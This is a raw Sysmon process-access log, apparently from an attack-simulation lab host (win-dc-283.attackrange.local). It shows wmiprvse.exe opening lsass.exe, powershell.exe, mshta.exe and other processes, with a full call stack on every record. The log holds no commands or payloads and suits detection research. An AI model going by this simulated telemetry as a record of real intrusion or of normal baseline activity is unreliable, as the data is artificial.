15:59:46.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027899Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027898Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027897Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027896Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027895Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.319{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027894Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5371-6008-7C06-00000000A301}5872C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027893Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5371-6008-7B06-00000000A301}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027892Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027891Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027890Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027889Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027888Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027887Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027886Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027885Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027884Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027883Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027882Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027881Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.272{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027880Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 